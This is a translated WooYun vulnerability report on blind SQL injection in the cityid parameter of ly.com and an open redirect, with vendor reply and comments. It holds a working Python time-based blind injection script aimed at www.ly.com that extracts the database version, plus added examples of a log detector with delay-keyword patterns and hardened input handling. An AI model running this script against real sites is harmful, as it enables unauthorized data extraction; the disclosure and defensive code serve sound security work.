
Vulnerability summary

Defect ID: wooyun-2015-095375

Title: Blind SQL injection on the Tongcheng (ly.com) main site, No. 2 (verification script attached)

Vendor: Suzhou Tongcheng Travel Network Technology Co., Ltd. (苏州同程旅游网络科技有限公司)

Author: xxyyzz

Submitted: 2015-02-03 11:53

Fixed: 2015-03-20 11:54

Published: 2015-03-20 11:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-02-03: Details sent to the vendor, awaiting vendor handling
2015-02-03: Vendor confirmed; details visible to the vendor only
2015-02-13: Details disclosed to core white hats and relevant domain experts
2015-02-23: Details disclosed to regular white hats
2015-03-05: Details disclosed to intern white hats
2015-03-20: Details disclosed to the public

Brief description:

Blind SQL injection on the Tongcheng main site, No. 2

Detailed description:

The cityid parameter of http://www.ly.com/dujia/AjaxCallNew.aspx?type=GetQianzhengSearch&iid=0.567149235517985&cityid=321 is vulnerable to blind SQL injection.
There is also an open redirect (URL redirection) issue:
http://guard.ly.com/authcode.aspx?returnUrl=http%3a%2f%2fwww.baidu.com%2findex.php%3ftn%3dmonline_5_dg&ac=372259583

[Screenshot: 0.png]


Proof of vulnerability:

[Screenshot: 2.png]


#-*-coding:utf-8-*-
# Time-based blind SQL injection verification script (Python 2, uses httplib).
# For each character position of @@version it tries every candidate byte; the
# injected "waitfor delay" fires only when the guess is right, so a request
# that exceeds the 4-second socket timeout marks the correct character.
import httplib
import time
import string
import sys
import random
import urllib

headers = {
    'Cookie': 'Hm_lvt_ca5679d0986b1f42f800098b798c7008=1422580774; Hm_lvt_f97c1b2277f4163d4974e7b5c8aa1e96=1421055383,1421056354,1421135352,1421135572; Hm_lvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581413; SearchNew=%25E5%25A4%25A7%25E7%2590%2586%2526%25E5%258C%2597%25E4%25BA%25AC%25262015-02-02%2526%2526%2526; __tctma=144323752.1420797897384185.1420797897683.1422580182505.1422588301145.7; MAIF=||; MAIH=24489,24489,24489,77415,77415,135,24489,24489,24489; searchHistory=%E5%8C%97%E4%BA%AC,53,0,2015-01-13,2015-01-14; ABTest_115=657#1#42952259; MAIQZ=131; MAIHL=201448,201448,70855; Hm_lvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422588841; Hm_lvt_0f71f0877229e4e6503de92a28cbf166=1422589516',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}

# Candidate characters: letters, digits and a few punctuation marks
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.', '-', '\\', ' ']

print 'Try to retrieve SQL Server Version:'
user = ''
for i in range(1, 30, 1):  # character position within @@version
    for payload in payloads:
        timeout_count = 0
        try:
            conn = httplib.HTTPConnection('www.ly.com', timeout=4)
            random.seed()
            #area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- " % (i, ord(payload))
            #print i
            #print ord(payload)
            #headers['Cookie'] = "area=" + urllib.quote(area)
            url = "/dujia/AjaxCallNew.aspx?type=GetQianzhengSearch&iid=0.567149235517985&cityid=321" + "if%28ascii%28substring%28%40%40version%2c" + str(i) + "%2c1%29%29=" + str(ord(payload)) + "%29waitfor%20delay'0%3a0%3a5'"
            #print url
            #time.sleep(0.1)
            start_time = time.time()
            conn.request(method='GET',
                         url=url,
                         headers=headers)
            conn.getresponse()
            conn.close()
            print '.',
            time.sleep(1)  # robots: throttle the request rate

        except Exception as e:
            # A socket timeout means the delay fired, i.e. the guessed byte matched
            #print e
            timeout_count += 1

        if (timeout_count == 1):
            user += payload
            print '[In Progress]', user
            break
print '\n[Done], SQL Server version is', user
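From the defender's side, both issues in this report leave a recognisable trace in the web server's access log: a delay primitive such as waitfor delay inside a query parameter (paired with an unusually slow response, as the script above relies on), and a returnUrl that points at a host outside the site. The following Python 3 detector is an added example, not part of the original report or of Tongcheng's tooling. The log lines are constructed (Common Log Format with a trailing response-time-in-milliseconds field), and the trusted-host list, the list of redirect parameter names and the 4000 ms threshold are assumptions.

```python
# -*- coding: utf-8 -*-
"""Spot time-based blind SQL injection and open-redirect probes in access logs.

Added example, not part of the original WooYun report. The log lines, the
trusted-host list and the slow-response threshold are constructed assumptions.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlparse

# Constructed sample lines: Common Log Format plus a trailing response time (ms).
SAMPLE_LOG = """\
203.0.113.7 - - [03/Feb/2015:11:40:01 +0800] "GET /dujia/AjaxCallNew.aspx?type=GetQianzhengSearch&iid=0.5671&cityid=321 HTTP/1.1" 200 512 120
203.0.113.7 - - [03/Feb/2015:11:40:03 +0800] "GET /dujia/AjaxCallNew.aspx?type=GetQianzhengSearch&iid=0.5671&cityid=321if%28ascii%28substring%28%40%40version%2c1%2c1%29%29=77%29waitfor%20delay'0%3a0%3a5' HTTP/1.1" 200 512 5130
203.0.113.7 - - [03/Feb/2015:11:40:09 +0800] "GET /authcode.aspx?returnUrl=http%3a%2f%2fwww.baidu.com%2findex.php&ac=1 HTTP/1.1" 302 0 15
198.51.100.2 - - [03/Feb/2015:11:41:00 +0800] "GET /authcode.aspx?returnUrl=%2fmember%2findex.aspx&ac=1 HTTP/1.1" 302 0 12
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<ms>\d+)$'
)
# Delay primitives of the common engines (MSSQL, MySQL, PostgreSQL).
DELAY_RE = re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(|pg_sleep\s*\(", re.I)
REDIRECT_PARAMS = {"returnurl", "redirect", "url", "next", "goto"}  # assumption
TRUSTED_HOSTS = {"www.ly.com", "guard.ly.com"}  # assumption: the site's own hosts
SLOW_MS = 4000                                  # assumption: normal responses are far faster


def parse_line(line):
    """Return the fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["ms"] = int(fields["ms"])
    return fields


def inspect_request(target, ms):
    """Return a list of (kind, param, detail) findings for one request."""
    findings = []
    query = urlparse(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded payloads
        decoded = unquote_plus(value)
        if DELAY_RE.search(value) or DELAY_RE.search(decoded):
            findings.append(("time_based_sqli", name, decoded))
        if name.lower() in REDIRECT_PARAMS:
            host = urlparse(decoded).hostname
            if host and host not in TRUSTED_HOSTS:
                findings.append(("open_redirect", name, host))
    if ms >= SLOW_MS:
        findings.append(("slow_response", None, ms))
    return findings


def scan(log_text):
    """Return one record per suspicious line: ip, timestamp and findings."""
    hits = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields is None:
            continue
        findings = inspect_request(fields["target"], fields["ms"])
        if findings:
            hits.append({"ip": fields["ip"], "ts": fields["ts"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["ts"])
        for kind, param, detail in hit["findings"]:
            print("  ", kind, param, detail)
```

A slow response on its own is only a weak signal; the combination of a delay keyword in a parameter and a response time near the requested delay is what makes the second line stand out, and a sequence of such requests from one client, each differing only in the position and compared byte, is the signature of an extraction run like the script above.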


Fix recommendation:

Filter the parameter.

Copyright notice: reprints must credit the source, xxyyzz@WooYun
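What "filter the parameter" means in practice for the two issues in this report, as an added Python 3 example that is not the site's code: cityid is accepted only as a bounded decimal integer and then passed to the database as a bound parameter, so its value can never be interpreted as SQL, and returnUrl is accepted only as a same-site relative path or as an absolute URL on an allowlisted host. SQLite in memory stands in for the real SQL Server backend; the table, its rows, the trusted-host list and the function names are assumptions.

```python
# -*- coding: utf-8 -*-
"""Hardened handling of cityid and returnUrl (added example, not the site's code).

SQLite stands in for the site's SQL Server backend; the table, the rows, the
trusted-host list and the function names are constructed assumptions.
"""
import re
import sqlite3
from urllib.parse import urlparse

CITYID_RE = re.compile(r"\d{1,9}")              # a bounded positive integer, nothing else
TRUSTED_HOSTS = {"www.ly.com", "guard.ly.com"}  # assumption: the site's own hosts


def make_demo_db():
    """In-memory table with constructed rows, so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visa_search (cityid INTEGER, city TEXT, note TEXT)")
    conn.executemany(
        "INSERT INTO visa_search VALUES (?, ?, ?)",
        [(321, "Dali", "visa info A"), (53, "Beijing", "visa info B")],
    )
    return conn


def build_query_unsafe(cityid_raw):
    """The shape of the bug in the report: untrusted text pasted into SQL.
    Shown for contrast only; this function is never executed against a database here."""
    return "SELECT city, note FROM visa_search WHERE cityid=" + cityid_raw


def is_valid_cityid(cityid_raw):
    """Accept only a plain decimal integer; anything else is rejected outright."""
    return CITYID_RE.fullmatch(cityid_raw) is not None


def lookup_city_safe(conn, cityid_raw):
    """Validate the parameter, then bind it; the value can never become SQL."""
    if not is_valid_cityid(cityid_raw):
        raise ValueError("cityid must be a positive integer")
    cityid = int(cityid_raw)
    cur = conn.execute("SELECT city, note FROM visa_search WHERE cityid = ?", (cityid,))
    return cur.fetchall()


def safe_return_url(raw, default="/"):
    """Allow only same-site relative paths or absolute URLs on trusted hosts."""
    parts = urlparse(raw)
    if parts.scheme == "" and parts.netloc == "":
        # relative path; reject "//host" and "/\host", which browsers treat as external
        if raw.startswith("/") and raw[1:2] not in ("/", "\\"):
            return raw
        return default
    if parts.scheme in ("http", "https") and parts.hostname in TRUSTED_HOSTS:
        return raw
    return default


if __name__ == "__main__":
    db = make_demo_db()
    print(lookup_city_safe(db, "321"))
    print(safe_return_url("http://www.baidu.com/index.php"))
    print(safe_return_url("/member/index.aspx"))
```

The redirect check compares parts.hostname rather than the raw string, so forms such as http://www.ly.com@evil.example/ (user-info trick) and http://www.ly.com.evil.example/ (suffix trick) are both rejected, and non-HTTP schemes such as javascript: fall through to the default.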


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-02-03 12:27

Vendor reply:

Thank you for your attention to Tongcheng Travel; we will arrange a fix this afternoon.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-02-06 09:45 | Me_Fortune ( regular white hat | Rank:209 vulnerabilities:71 | I'm Me_Fortune)

    Could the OP share the technique for detecting blind injection with Burp?

  2. 2015-02-07 18:58 | xxyyzz ( intern white hat | Rank:57 vulnerabilities:6 | 123456)

    Received the 200 gift card, thanks.